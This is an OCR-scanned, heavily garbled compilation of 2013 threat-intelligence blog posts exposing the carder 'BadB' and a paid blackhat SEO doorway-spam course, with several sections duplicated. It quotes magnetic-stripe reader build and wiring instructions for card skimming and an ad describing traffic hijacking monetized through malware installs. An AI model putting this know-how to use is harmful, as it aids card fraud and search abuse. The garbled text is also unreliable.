5. http://blog. webroot . com/2013/03/07/new-diy-hacked-email-account-content-grabbing-tool-facilitates-cyber-e 


spionage-on-a-mass-scale/ 


ttp://blog. webroot .com/2013/03/08/new-diy-unsigned-malicious- java-applet-generating-tool-spotted-in-the- 


ttp://blog. webroot .com/2013/03/11/commercial-steam-information-harvestermass-group-inviter-could-lead-to 


targeted-fraudulent-campaigns/ 


8. http://blog. webroot .com/2013/03/12/fake-bofa-cashpro-online-digital-certificate-themed-emails-lead-to-ma 


9. http://blog. webroot .com/2013/03/13/spamvertised-bbb-your-accreditation-terminated-themed-emails-lead-to- 


lack-hole-exploit-kit/ 


10. http://blog. webroot .com/2013/03/14/new-zeus- source-code-based-rootkit-available-for-purchase-on-the-und 


erground-market/ 


11. bttp://blog.webroot.com/2013/03/15/cybercriminals—resume-spamvertising-re-fwd-wire-transfer-themed-emai 


1ls-serve-client-side-exploits-and-malware/ 


12. bttp://blog.webroot.com/2013/03/19/cybercrime-friendly-community-branded-httpsmtp-based-keylogger-spott 


ed-in-the-wild/ 


13. ttp://blog.webroot . com/2013/03/20/hacked-pcs-as-anonymization-stepping- stones-service-operates- in-the- 


oY 


> 


open-since-2004/ 
14. http://blog. webroot .com/2013/03/21/fake-cnn-breaking-news-alerts-themed-emails-lead-to-black-hole-explo 


15. http://blog. webroot. com/2013/03/22/spotted-cybercriminals-working-on-new-western-union-based-money-mule 


management-script/ 


16. http://blog. webroot .com/2013/03/25/malicious-bbc-daily-email-cyprus-bailout-themed-emails-lead-to-black 


hole-exploit-kit/ 


17. http://blog. webroot .com/2013/03/26/adp-payroll-invoice-themed-emails-lead-to-malware/ 
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18. http://blog. webroot .com/2013/03/27/terminated-wire-transfer-notificationach-file-id-themed-malicious-ca 


paigns-lead-to-black-hole-exploit-kit/ 


. http: //blog. webroot .com/2013/03/28/new-diy-rdp-based-botnet- generat ing-tool-leaks-in-the-wild/ 


. http: //blog.webroot .com/2013/03/29/a-peek- inside-the-egypack-web-malware-exploitation-kit/ 


21. http://ddanchev.blogspot.com/ 
22. http://twitter.com/danchodanche 


9.4.2 Historical OSINT - The "BadB_ International" Cybercrime Enterprise 
(2013-04-10 21:53) 


This is mr. Mihail Hodorkovski, ex-CEO of the Yukos company. 
In earlier times, when dump bussines was not so dangerous 
he earned his first money and established Yukos company. MP") ** 


[1]BadB is the nickname of Vladislav Anatolievich Horohorin, a high profile carder, who 
eventually [2]got busted in France in 2010. This month, he was [3]sentenced to serve 88 
months in prison, ordered to pay $125,739 in restitution, and sentenced to two years of 
supervised release. 


© QadB International 


Mar Mer 


Latest trers Popular 


romtcegyenen com ior @ 
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In the wake of these events, | decided to release some raw OSINT data regarding BadB’s 
official Web site, hxxp://badb. biz. 


Mechanics of the reader 


M you want to read magnetic stripes successfully, you should use a mechanical device to swipe cards 
stably and rebably. You can either swipe the card over the head or the head over the card. | chose the 
second method 
in Bis Case you should attach He magnetic head (with the sensitive sdedownwards) to a piece of plastic, 
wood or something with a regular shape and 2 smooth surface. Then fix two strips (one at each side of the 
bead) on a board 2s a rail in whech the magnetic head can only move forward and backward (smocwy) 
Be aware to leave enough space between fhe Board and the strips in order to introduce the card which is 
going to be read. Once you fix the card on the board, wih its magnetic stripe running parallel to the strips. 
you can swipe the head along fhe card easily. Now you only have to move in smal steps the position of 
the card until you find the track to be read. You know that the track is Caught when the signal trom the 
ampéfier is 3 perfect square wave with maxcrmum amplitude and minimum noise. As long as the majority of 
te cards follows the ISO standards, | suggest you to make scene marks on the reader to sign the 
of the tracks. So you don't have to repeat the whole process each time you want to read a card. 
it may be mot the most sienple or efficsent reader mechanics, bul if allowes you to read virtually any tack of 
any catd of Gocument, ie. € is mot restricted to standard size cards or standard posiion tracks. See 
photos below to get an impression of the reader (click on images to enlarge). | apologize for the bad 
Quality, | wasn't able to get a betier digtal camera (I used a cheap webcam) 


Lately I've been using a very simple method to swipe cards which does not require 2 special board with 
strips fixed on & (rails). Sempty put the card om your computer table and use the keyboard as rail for the 
magnetic head, Le. #s lke the method above bul using a normal table and jest one ral, one side of your 
computer keyboard. Put two cards one at each side of the card fo be read (al three cards should have the 
same thickness) to help the magnetic head to move senoothily (you #8 need to affach the head to 
something suited for swiping) Be sure the magnetic stipe of the auxibary Cards do not interfere with the 
Magnetic sipe to be read, ie. he magnetic head ts not going to swipe them as wel. The only probiem is 
to keep the magnetic stripe aligned with the keyboard. find your our method to f& this. 


Using the software 


The mhagnetc strip reader should be connected to the joystick poet (cufput of the reader to pin 2 and 
Qrownd to pin 4) or to theparaliel port (cufput of the reader to pin 15 and grownd topin 18) of a PC @ you 
are guing to use the so@ware provided in these pages. | found a betier pericemance using the parallel 
poet, and 20, Sat is the defaull port. You can use any PC, tere is no need fer a fast powerful PC. Compie 
the source code optimizing fee speed. Mf you don't use Turbo C++ v1.01, you may meed fo change a ide 
ba the code, mainly headers and function naenes. 


Related URLs: hxxp://badb.biz; hxxp://badb.org; hxxp://dumps.name 


Emails: badb4cc@yahoo.com; metaksa _s@yahoo.com; support@agava.com; 


min@agava.com; admin@carderplanet.biz 


ICQ: 49162552 


Phone number: +19522325532 (Working according to BadB in 2009) 


ad- 


IP hosting history for badb.biz from 2005 to 2010 in the format (initial hosting IP -> IP 
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change detected to a new IP): 
217.107.212.115 -> 64.202.167.129 
64.202.167.129 -> 217.107.212.115 
217.107.212.115 -> 217.107.212.9 
217.107.212.9 -> 89.108.66.104 
89.108.66.104 -> 68.178.232.99 
68.178.232.99 -> 89.108.66.104 
216.8.177.23 -> 78.109.18.150 
78.109.18.150 -> 196.32.222.9 
89.108.73.117 - >94.75.221.75 
94.75.221.75 -> 92.241.164.92 


Some results 


il i \\ 
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Sample Abous Us section description from badb.biz: 

We are independent e-commerce security investigation group. We are help e-commerce or- 
ganisations such as Visa, Mastercard, regional processings and other e-commerce structures 
to understand how vulnerable they are. We are not connected to any crimminal structures, 
not performing any outlaw actions by ourselves, not selling drugs, not sendinding any spam, 
not connected to any child porno, not supporting terrorists itselves nor terrorist organisations. 
If you received any spam from us - this is a fake of our enemies we are never use spam to 
promote our site. All information you can read here provided "As Is" and only for educational 
purposes. All articles are copyrighted. If you wish to take any part of information from here - 
please reffer to origination site. All we do - is we have for sale some dumps, cvvs and cobs 
- just for experemental purposes of our custommers ;-) We listen and effectively respond to 
your needs and those of your clients. We are experts at translating those needs into marketing 
solutions that work, look great and communicate well. Each day brings increased opportunity 
to increase business in current as well as new. 


This case is a great example of a simple fact - with or without BadB, [4]the market for 
stolen credit cards data, continued growing throughout the entire 2011. Then in 2012, we 
witnessed two law enforcement operations, courtesy of [5]SOCA, and the [6]FBI. However, 
despite these efforts, the market for stolen credit cards data remains as vibrant as always. 


Thanks to the [7]standardization taking place in respect to the money mule recruitment 
process, as well as the nearly identical online shops for stolen credit cards data, those who 
cannot "cash out" the balances of the credit cards, will choose to [8]risk-forward the selling 
process to the buyers of the stolen data. The rest, will basically continue looking for more 
efficient, automatic, and anonymous ways to get access to the stolen money, continuing to 
rely on money mules of virtual currencies. 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him 
[10]Jon Twitter. 


1. [taps / Tw. youtube on /wateh?v-6y4iijXGeg 
2. netp:// wired. com/threatlevel/2010/06/vadb/ 

3. http://www. justice .gov/opa/pr/2013/April/13-crm-386 . html 

4. http://ddanchev. blogspot . com/2011/10/exposing-market-for-stolen-credit-cards. html 


5. http://www.soca.gov.uk/news/446-web-domains- seized-in-international-operation-to-target-online-fraudsters 


6. http: //www.zdnet .com/blog/security/24-cybercriminals-arrested-in-operation-card-shop/1243 


7 
8. http://blog. webroot . com/2013/03/22/spotted-cybercriminals-working-on-new-western-union-based-money-mule- 
5 

10. 


9.4.3 Historical OSINT - The "BadB_ International" Cybercrime Enterprise 
(2013-04-10 21:53) 


This is mr. Mihail Hodorkovski, ex-CEO of the Yukos company. 
In earlier times, when dump bussines was not so dangerous 
he earned his first money and established Yukos company. ™?"*” 


4165 


[1]BadB is the nickname of Vladislav Anatolievich Horohorin, a high profile carder, who 
eventually [2]got busted in France in 2010. This month, he was [3]sentenced to serve 88 
months in prison, ordered to pay $125,739 in restitution, and sentenced to two years of 
supervised release. 


© SadB Intemational 
ms you bet 


bette Gyro com 


In the wake of these events, | decided to release some raw OSINT data regarding BadB’s 
official Web site, hxxp://badb. biz. 
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Mechanics of the reader 


M you want to read magnetic stripes successtully, you should use a mechanical device to swipe cards 
stably and reliably. You can either swipe the card over the head or the head over the card. | chose the 
second method 

in Bs Case you should attach Be magnetic head (with the sensitive sdedownwards) to a piece of plastic, 
wood or something with a regular shape and a smooth surface. Then fix two strips (one at each side of the 
bead) on a board as 2 rail in weach the magnetic head can only move forward and backward (smoot y) 
Be aware to leave enough space between the Board and the strips in order to introduce the card wesch is 
going to be read. Once you fix the card on the board, with its magnetic stripe running parallel to the strips, 
you can swipe the head along He card easily. Now you only have to move in small steps the position of 
the card until you find the track fo be read. You know that the track is caught when the signal from the 
ampitier is a perfect square wave with maccrmum amplitude and minimum nore. As long as the majceity of 
the cards follows the ISO standards, | suggest you to make some marks on the reader to sign the posion 
of the tracks. So you don't have to repeat the whole process each time you want to read a card 

it may be mot the most sienple or efficient reader mechanics, bul if allows you to read virtually any tack of 
any cased of Gocument, Le. @ is mot restricted to standard sire cards or standard posifion tracks. See 
photos below to get an impression of the reader (click on images to enlarge). | apologize for the bad 
quality, | wasn't able to get a betier Gigtal camera (I used a cheap webcam) 


Lately I've been using 2 very simple method to swipe cards which does not require 2 special board with 
strips fixed on ff (raits). Sumpty put the card om your computer table and use the keyboard as rail for the 
magnetic head, i.¢. #s lke the method above bul using a normal table and just one rai, one side of your 
computer keyboard. Put two cards one at each side of the card fo be read (al three cards should have the 
same thickness) to help the magnetic head to move smoothly (you st need fo attach the head to 
something suited for swiping) Be sure the magnetic stripe of the auxiliary cards do not mterfere with the 
magnetic siripe to be read, ie. he magnefc head is not going to swipe them as wel The only probiem is 
to keep the magnetic stripe aligned with the heyboard, find your our method to f& this. 


Using the software 


The magnetic strip reader should be connected to the joystick poet (cufput of the reader to pin 2 and 
Qrownd to pin 4) or to theparaiiel port (cufput of the reader to pin 15 and grownd topin 18) of a PC @ you 
are going to use the so@ware provided in these pages. | found a betier perfoemance wsing the parallel 
poet, and 20, Bat is the defaull poet. You can use any PC, Bere is no need for a fast powerful PC. Compie 
the source code optienizing for speed. Hf you don't use Turbo C++ v1.01, you may meed to change a iife 


Related URLs: hxxp://badb.biz; hxxp://badb.org; hxxp://dumps.name 


Emails: badb4cc@yahoo.com; metaksa _s@yahoo.com; support@agava.com; 


min@agava.com; admin@carderplanet.biz 


ICQ: 49162552 


Phone number: +19522325532 (Working according to BadB in 2009) 


ad- 
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IP hosting history for badb.biz from 2005 to 2010 in the format (initial hosting IP -> IP 
change detected to a new IP): 


217.107.212.115 -> 64.202.167.129 
64.202.167.129 -> 217.107.212.115 
217.107.212.115 -> 217.107.212.9 
217.107.212.9 -> 89.108.66.104 
89.108.66.104 -> 68.178.232.99 
68.178.232.99 -> 89.108.66.104 
216.8.177.23 -> 78.109.18.150 
78.109.18.150 -> 196.32.222.9 
89.108.73.117 - >94.75.221.75 
94.75.221.75 -> 92.241.164.92 
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Some results 


Sample Abous Us section description from badb.biz: 


We are independent e-commerce security investigation group. We are help e-commerce 
organisations such as Visa, Mastercard, regional processings and other e-commerce struc- 
tures to understand how vulnerable they are. We are not connected to any crimminal 
structures, not performing any outlaw actions by ourselves, not selling drugs, not sendinding 
any spam, not connected to any child porno, not supporting terrorists itselves nor terrorist 
organisations. If you received any spam from us - this is a fake of our enemies we are 
never use spam to promote our site. All information you can read here provided "As Is" and 
only for educational purposes. All articles are copyrighted. If you wish to take any part of 
information from here - please reffer to origination site. All we do - is we have for sale some 


4169 


dumps, cvvs and cobs - just for experemental purposes of our custommers ;-) We listen and 
effectively respond to your needs and those of your clients. We are experts at translating 
those needs into marketing solutions that work, look great and communicate well. Each day 
brings increased opportunity to increase business in current as well as new. 


This case is a great example of a simple fact - with or without BadB, [4]the market for 
stolen credit cards data, continued growing throughout the entire 2011. Then in 2012, we 
witnessed two law enforcement operations, courtesy of [5]SOCA, and the [6]FBI. However, 
despite these efforts, the market for stolen credit cards data remains as vibrant as always. 


Thanks to the [7]standardization taking place in respect to the money mule recruitment 
process, as well as the nearly identical online shops for stolen credit cards data, those who 
cannot "cash out" the balances of the credit cards, will choose to [8]risk-forward the selling 
process to the buyers of the stolen data. The rest, will basically continue looking for more 
efficient, automatic, and anonymous ways to get access to the stolen money, continuing to 
rely on money mules of virtual currencies. 


. http: //www.wired.com/threatlevel/2010/08/badb/ 
. http://www. justice. gov/opa/pr/2013/April/13-crm-386.htm 
. http: //ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards.htm 


ttp://www.soca. gov.uk/news/446-web-domains-seized-in-international-operation-to-target-online-fraudsters 


http://www. youtube. com/watch?v=9y4ii jOXGeg 


ttp://www.zdnet .com/blog/security/24-cybercriminals-arrested-in-operation-card-shop/1243 


. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 


http: //blog.webroot.com/2013/03/22/spotted-cybercriminals-working-on-new-western-union-based-money-mule-m 
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9.4.4 What’s the ROI on Going to a Virtual Blackhat SEO School? (2013-04-17 23:45) 


CONTACTS 


a 

Pe" 

a te 
W 
Y 


New car, travel, plastic card with half a million rubles | 
balance . 

A fairy tale? For many, yes, but for us - no! For us if is a 
reality that lasts for more than 3 years! 


Who are we? Family! A strong united family, in which 
you did not throw, and in which you will help achieve 
your Goais Ss. 


What we do? We are engaged in doorways. Forget 
about boring 100 sheet manuals that are written by 
people far removed from the search engine 
optimization! We practice and therefore our information 
is always current. Our sysiem of wages worked equally 
well in 2010 and now 


Thanks to our Peraee 4 he we have achieved their 


students 


For years, fraudulent or [1]purely malicious actors have been abusing the online advertising 
market, by [2]directly hijacking and redirecting [3]the revenue flow, or by [4]successfully 
and efficiently hijacking as much percentage of legitimate search traffic as possible, and 
monetizing it through the use of [5]blackhat SEO (search engine optimization) tactics/shady 
affiliate networks. 


[6]Monetizing the very monetization process? Standardizing the revenue generation, and 
knowledge spreading streams, achieving efficiencies in the process, and directly contributing 
to a new, this time better trained/educated generation of Blackhat SEO-ers? Someone he’s 
knowingly or unknowingly on a mission. A mission with a brand. 


In this post, lll profile a highly successful [7]blackhat SEO ’school" that promises the 
Moon, but asks for nothing except $1,000 for the training course, which will turn you into a 
sophisticated blackhat SEO expert, netting you huge amounts of money. 


Operating in the open since 2010, the service is currently (2013) asking for $350, pre- 
sumably to keep the new customers flow going. Since it’s initial launch data, the business 
model has been relying on a loyal set of people who already "took" the course, and continue 
making money up to present day. A loyalty and happy customer "feedback" best demon- 
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strated by featuring exclusive screenshots courtesy of the happy customers. 


Initial forum advertisement: 
Welcome to the forum millionaires! So, | decided, now | will welcome the new students. 


And you know why? 


My course, and our forum for more than two years, and during that time has accumu- 
lated a huge pile of reviews with the statistics. Wondered how many of my students have 
earned over 2 years on my course? 


And it turned out that except cars, apartments, purely according to PP, pupils together earned 
17 million rubles! And it is only those who have shown their statistics. And | think in 2 years 
they could make a few more millions. (Figure is slightly inaccurate to 9 lines in a notebook | got 
tired and started to round + decided not to take into account the 3,000,000 earnings per pupil) 


In two years, we have made dozens of millionaires in Russia, Ukraine and Belarus Their 
lives changed immediately, as soon as they hit the family. People sitting in debt in a few 
months to buy a new car. 


People are sitting at their desks yesterday brought home two monthly salaries parents, 
and explained that it is unashamedly from the Internet, it is their earnings! 


People who are already my course have been very successful become even more suc- 
cessful. The forum is stable enough people who earn a day 50-60 thousand rubles. This is not 
theoretical, not uncle in suits, this is the same young guys like you or me. 


Although | must admit, the forum is and uncle in suits for 30-40 years, primarily to get 
through doorways capital to support their business. 


And all these people realize that they are family, friends, and they willingly associate, 
dividing their experiences, secrets! Access to the course - it is a unique opportunity to touch 
the thought of successful people, to breathe the same air with them, get their energy and join 
the ranks of millionaires. 


As early as the year, the forum has two tech support, and username, people are few 
easy counseled hundreds of students and even if they did not do dory - would know what the 
perfect doorway. 


BUT! They do work, make Dora always advise how to make your doorway even better 
answer the most stupid question, and will lead to the most stable earnings. 


Now, if you are reading these lines and think that $ 1000 for access and the opportunity 
to become a millionaire in 24\7 support from a support, for the opportunity to be in the new 
family is expensive, | never selling you access. 


We need people who value themselves, their money and time. If $ 1,000 seems to you 


a great price, then you will never become a millionaire from the internet and you simply do 
not want my family. 
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Imagine you paid $ 1,000 in the bank say, come back every day to ask questions and 
get a month - $ 100,000, it is tempting? Here’s a bank - this is our forum. And 80 pages of 
reviews stands surety for this bank. 


You may think, but what for me is all good topic no one will sell! 


And | grieve you, it’s not the topic, not the scheme, not the holy grail, it’s work. Work 
by a support forum and make it so simple that you will forget the times when you have not 
worked with doorways. 

A successful guys will charge you so much energy that the work will be for you the best thing 
in life. You’re going to sleep at 4:00, waking up in the middle of the night with burning eyes, 
watch as your dorveychiki live there, and how many thousands have already dripped while 
you were sleeping. 

Through it all the disciples, and | think they would give, and 10 and 100 thousand dollars to 
get through it again. 


But there is a dump in a Public Forum, everything is - you Say. 


And I'll tell you the story of how one day | lost the backup of offline and restored the fo- 
rum 15 minutes ago from what it was last time. And it was a huge mistake! Lost about 50 
messages, 12 topics and 5-6 blog posts! The disciples were indignant. On our forum mad 
update rate, and dump the last year and the relevance of information out there already in 
negative degrees and | am afraid that only harms doorways. 


But! can learn myself! Yes you can, spend a few years on independent learning. 


And you can put a time out and spend $ 1000 on an active training week and immedi- 
ately makes the doorways correctly. Once again, we are waiting for our club anonymous 
millionaires of people who know the value of money and his own time, who want to invest in 
yourself, earn, and not break your head against the wall, when there are people who will show 
how to get around. 


Course can be purchased on the preliminary interview in ICQ price - $ 1000. 


And remember, we are, we need special people, very few of them, they are people who 
are willing to invest in yourself and do not try to save yourself cheaply though. So | throw 
in ICQ to ignore anyone who asks me for a discount or credit. | understand that in spite of 
the 80-page review, you may be unsure if it will work with you. Therefore, we give a new 
guarantee manibeka. If two weeks you feel - that doorway - it’s not yours, we will refund the 
money and pay the top 5 million rubles, for what you have spent your time! 


Frequently Asked Questions (FAQ) 
Good day, and now its time to answer all the questions a novice who wants to buy a course to 
dot the i, made to understand that he buys, he will get what may dobitsya.Nus’s begin. 


1.Chem we do? 


Black seo.Dorvei.Dory are very flexible and tenacious tool for earnings, its flexibility due 
to the variety of topics and types of monetization, and vitality - the existence of PS, and how 
long will exist as long as the search engines will be using dory. We produce traffic, ie the 
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users, ie the people, the traffic is the blood in the veins of the internet, and this is the main 
advantage that dorveyschik unlike white SEOs can in a short time to break a lot more traffa a 
completely different subjects and to merge it back where it needs. in a simple version of all 
is: 

1.Registriruemsya an affiliate program, it gives you the choice of partner sites of some topics 
(topics vary from porn and finishing all kinds of divination), statistics (to track kollvo coming 
to your site, paid for kollvo, Colva who have come again). 

2.Delaem doorway, we find: 

- Thematic traffistye quality keys (which are appropriate to the site subject we took from PP) 

- Template 

- Text 

All this is described in detail in the course and on the forum. 

3.Zalivaem doorway to shell 

4.Zhdem 4.3 apa (an - update Yandex search results, also known as SERP, quite by chance, 
usually up to one week, sometimes more) 

5.Poluchaem traff and accordingly money. 

Well this is just a simple and obvious option, work with SMS affiliate, to start - the fact that 
many small minded people to talk about the thousandth time of death doorways as income, 
just because of the changes in the SMS payment, it’s wrong, it’s stupid, it’s self-deception to 
deceive drugih.I as, say, we have learned to produce traffic, our traffic started to give Dora 
and now we have to redirect it somewhere ie merge and convert / convert into money, a lot 
of options: 

1.Partnerki with sms payment, the most obvious and as | wrote the best option to start. 
2.Partnerki pay-per-download and install the file, such PP a lot, and they are all different, from 
the fact that you are paying for the jump and the malicious Trojan or whether something like 
that, to quite formal type of games WORLD of-tanks, Yandex bars etc. and tp.lmeya large 
amounts of traffic (which is the second task dorveyschika, increase the volume of traffic) in 
the first and in the second option holders PP will take you with open arms and make bonuses. 
3.Svoi online shopping and platniki.V this topic a little feedback from these guys, as many 
prefer to work with SMS and other PP, but byvali.Odin met some of the students at comrade 
serche, he did an Internet jewelry store and the problem was my student in the production of 
traffic, he quickly picked up, done and grabbed a piece of the profit. 

All that | wrote just for you to understand, | teach mine traffic, targeted traffic from search 
engines, | would suggest the best methods of monetization, by which usually fight off the 
course, but never forget that you have a great opportunity to go and grab a piece of the traffa 
on desired topics with Yandex and merge where necessary. 


2.Navernoe topic died, bought her so much, so long existed, much is competi- 
tion? 


| am for all the time of sale of the course has experienced the death of a thousand and 
one as the reward scheme, but that’s amazing, for some reason all those who want to - 
successfully earn dorah.Chto for competition - in dorah very high turnover, namely Dora 
always fly into the index ( Yandex search) and flew over, it’s all backed by the characteristic 
features of the behavior dorveyschika and dorveyschik often tasting dough, he realized how 
easily make dory, does pack and walk yourself getting denyuzhki, leaving room for other 
results. 


3.Zachem you sell? 
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That’s what | do - called infobiznesom admit, when all this started, | such a word and 
znal.Est two concepts, with which you can ever accurately explain the infobiznesa, informa- 
tion and insider information autsayder.Kogda-long ago, when | was dramas and gathering 
information about them bit by bit on various forums - | was an outsider, | was not available 
methods that can quickly lead to success, and everything had to be found by experiment, my 
first income from went after 3 months and a naked enthusiasm nadezhdy.Pokupaya course 
you get insider information, which is called the bat, straight to the kitchen where everything 
is cooked, | do not sell super flow sheet, | only give an opportunity and take it for a fee, sell 
their time and, in recent years, more and more nerves, which is why, in order to maintain this 
non-renewable resource, and | wrote it, do not be lazy, read. 


4.Kak guarantee that I Otobaya course? 


No! Absolutely! Absolutely no, When we first started selling rate - while | was still able 
to provide guarantees to score reviews, to prove to everyone that the theme works, but now 
- no, no way! Your warranty - you, your desire, hard work , commitment - that guarantee 
it, | can not guarantee anything | can not and will not, often when a person writes me word 
guarantee, he wants me to take responsibility for his lazy ass over - No, I’m sorry. 


5.Malenky advice, how to effectively master the course and see if it fits you 
at all. 


My experience learning heaps different people, still divided them into two types, this is 
a huge difference, the gap between the two approaches to learning, results in a huge gap in 
the success of these students. 

The first type: people with pure slave mentality, they need to stick, do not explain, do not 
need to seek understanding, just poke, push there, click here. 

How he thinks: Suppose we make a template for Dora, and we need to write deksripshen, 
deskripshen - description of the site which comes out at the bottom under the link, his task - 
to give information about the page and encourage people to move to tyknut ie sayt.On asks 
me what write here, | explain what it is and 1 say write something that would please you, and 
you would make pereyti.On in a stupor, he can not think and can not even offer the option, he 
just wants me to tell him that there napisat.Eto not right! 

The second type: The second type is often trying to organize all the information in the first 
place to understand how things work, and there are already having a solid foundation and 
framework - to batter me with questions and to increase their knowledge, for example of the 
first type, the second type, after hearing deskripshen what and why it is, would compare with 
my examples and offered his variant.Vot so you have to be, if you’re so - I'll be glad to have 
you in the ranks of students. 


6.Tsena huge! Tc asshole, the course did not buy, but it’s an asshole! Reviews 
delete it! 


Do not like the price - do not buy it, no one vparivaet, there is no hint of the imposition 
of the course, under the gun more so no one makes pokupat.Golye hit and conclusions about 
the course of those who did not buy it - please do not post, | immediately call the moderators, 
all is removed, how can you talk about the course, not having been on FSU How we can 
talk about what you do not know, if you were not in the motivation section on the forum 
where dozens of success stories of students? | bought the course, learned, wrote otzyv.Ya a 
moderator section only CEO and section on "Work" where this topic - | can not moderate. 
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7.What I receive after payment? 


Education - after payment receive video / txt + access to the forum, watch / read / do, 
have questions - ask, discuss - send to the forum, no - rasskazyvayu.Esli you read the topic 
that many people write that the chip in the forum, unnecessarily there is a lot of relevant info 
and all you happy pomoch.Ves free software data - paid counterparts shown in forume.Dostup 
forum and consultations Asik - unlimited. 


8.Skolko need to successfully quick Start? 


Then (in a week or another) will need $ 10-20 for vpn (both analog proxy / socks or 
Dedicated Server) and 200-300 rubles for glanders. 


9.Kak Otobaya fast I / osvoyu course? 


Everything is individual, calculate and even about to say (to you) this time period may 
depend both on the human factor (your knowledge, experience) and on Yandex, which is quite 
nepredskazuem.Osnovyvayas on the experience of previous students gives dor $ 200 4 up to 
30 days after the publication of indeks.3-4 apa usually climbs Dor ups are completely random, 
look here http://seobudget.ru/updates labeled SERP. 


10.Rynok forum. 


In our forum, which you can access after purchase - there is a market, as in any other 
forum, it is an integral part of the forum who wants to live, and in the end we are all in this 
forum for one reason - we all want to make money someone else has earned, someone just 
nachinaet.V Unlike other forums - the market for FSU controlling me, he monopolizirovan. 
Kursy of its kind in the forum - | only sell and no other, their commercial activities in the forum 
- with me coordinate is not necessary, but if it is removed - so she does not belong here. 


Screenshots provided by actual customers of the service, featuring its primary ICQ con- 
tact point: 
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Blackhat SEO - it doesn’t just pay the bills. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. http: //www.av-test.org/fileadmin/pdf/avtest_2013-03_search_engines_malware_english. pdf 

2. http: //ddanchev. blogspot .com/2010/07/sampling-malicious-activity-inside.html 

3. http://www. zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333 

4. http: //www.zdnet .com/blog/security/botnets-committing-click-fraud-observed/1200 

5. https: //www.google.com/#output=search&sclient=psy-abkq=site:ddanchev.blogspot.com+/22blackhat+seo/22k%o0q=si 
te:ddanchev. blogspot .com+/,22blackhat+seo/,22&gs_1= 

6. http: //ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.html 

7. https://www.google.com/#output=search&sclient=psy-ab&q=site:ddanchev.blogspot .com+blackhat+seo 

8. http: //ddanchev. blogspot .com/ 

9. http://twitter .com/danchodanchev 


9.4.5 What’s the ROI on Going to a Virtual Blackhat SEO School? (2013-04-17 23:45) 
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New car, travel, plastic card with half a million rubles 
balance . 


A fairy tale? For many, yes, but for us - no! For us itis a 
reality that lasts for more than 3 years! 


Who are we? Family! A strong united family, in which 
you did not throw, and in which you will help achieve 
your goals, 


What we do? We are engaged in doorways. Forget 
about boring 100 sheet manuals that are written by 
people far removed from the search engine 
optimization! We practice and therefore our information 
is always current. Our sysiem of wages worked equally 
well in 2010 and now 

Thanks to our hundreds of people have achieved their 

pendence. By the w 
‘ at co couple of reviews of o 


For years, fraudulent or [1]purely malicious actors have been abusing the online advertising 
market, by [2]directly hijacking and redirecting [3]the revenue flow, or by [4]successfully 
and efficiently hijacking as much percentage of legitimate search traffic as possible, and 
monetizing it through the use of [5]blackhat SEO (search engine optimization) tactics/shady 
affiliate networks. 


[6]Monetizing the very monetization process? Standardizing the revenue generation, and 
knowledge spreading streams, achieving efficiencies in the process, and directly contributing 
to a new, this time better trained/educated generation of Blackhat SEO-ers? Someone he’s 
knowingly or unknowingly on a mission. A mission with a brand. 


In this post, lll profile a highly successful [7]blackhat SEO ’school" that promises the 
Moon, but asks for nothing except $1,000 for the training course, which will turn you into a 
sophisticated blackhat SEO expert, netting you huge amounts of money. 
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Operating in the open since 2010, the service is currently (2013) asking for $350, pre- 
sumably to keep the new customers flow going. Since it’s initial launch data, the business 
model has been relying on a loyal set of people who already "took" the course, and continue 
making money up to present day. A loyalty and happy customer "feedback" best demon- 
strated by featuring exclusive screenshots courtesy of the happy customers. 


Initial forum advertisement: 
Welcome to the forum millionaires! So, | decided, now | will welcome the new students. 
And you know why? 


My course, and our forum for more than two years, and during that time has accumu- 
lated a huge pile of reviews with the statistics. Wondered how many of my students have 
earned over 2 years on my course? 


And it turned out that except cars, apartments, purely according to PP, pupils together earned 
17 million rubles! And it is only those who have shown their statistics. And I think in 2 years 
they could make a few more millions. (Figure is slightly inaccurate to 9 lines in a notebook | got 
tired and started to round + decided not to take into account the 3,000,000 earnings per pupil) 


In two years, we have made dozens of millionaires in Russia, Ukraine and Belarus Their 
lives changed immediately, as soon as they hit the family. People sitting in debt in a few 
months to buy a new car. 


People are sitting at their desks yesterday brought home two monthly salaries parents, 
and explained that it is unashamedly from the Internet, it is their earnings! 


People who are already my course have been very successful become even more suc- 
cessful. The forum is stable enough people who earn a day 50-60 thousand rubles. This is not 
theoretical, not uncle in suits, this is the same young guys like you or me. 


Although | must admit, the forum is and uncle in suits for 30-40 years, primarily to get 
through doorways capital to support their business. 


And all these people realize that they are family, friends, and they willingly associate, 
dividing their experiences, secrets! Access to the course - it is a unique opportunity to touch 
the thought of successful people, to breathe the same air with them, get their energy and join 
the ranks of millionaires. 


As early as the year, the forum has two tech support, and username, people are few 
easy counseled hundreds of students and even if they did not do dory - would know what the 
perfect doorway. 


BUT! They do work, make Dora always advise how to make your doorway even better 
4198 


answer the most stupid question, and will lead to the most stable earnings. 


Now, if you are reading these lines and think that $ 1000 for access and the opportunity 
to become a millionaire in 24\7 support from a support, for the opportunity to be in the new 
family is expensive, | never selling you access. 


We need people who value themselves, their money and time. If $ 1,000 seems to you 
a great price, then you will never become a millionaire from the internet and you simply do 
not want my family. 


Imagine you paid $ 1,000 in the bank say, come back every day to ask questions and 
get a month - $ 100,000, it is tempting? Here’s a bank - this is our forum. And 80 pages of 
reviews stands surety for this bank. 


You may think, but what for me is all good topic no one will sell! 


And | grieve you, it’s not the topic, not the scheme, not the holy grail, it’s work. Work 
by a support forum and make it so simple that you will forget the times when you have not 
worked with doorways. 

A successful guys will charge you so much energy that the work will be for you the best thing 
in life. You’re going to sleep at 4:00, waking up in the middle of the night with burning eyes, 
watch as your dorveychiki live there, and how many thousands have already dripped while 
you were sleeping. 

Through it all the disciples, and | think they would give, and 10 and 100 thousand dollars to 
get through it again. 


But there is a dump in a Public Forum, everything is - you say. 


And I'll tell you the story of how one day | lost the backup of offline and restored the fo- 
rum 15 minutes ago from what it was last time. And it was a huge mistake! Lost about 50 
messages, 12 topics and 5-6 blog posts! The disciples were indignant. On our forum mad 
update rate, and dump the last year and the relevance of information out there already in 
negative degrees and | am afraid that only harms doorways. 


But! can learn myself! Yes you can, spend a few years on independent learning. 


And you can put a time out and spend $ 1000 on an active training week and immedi- 
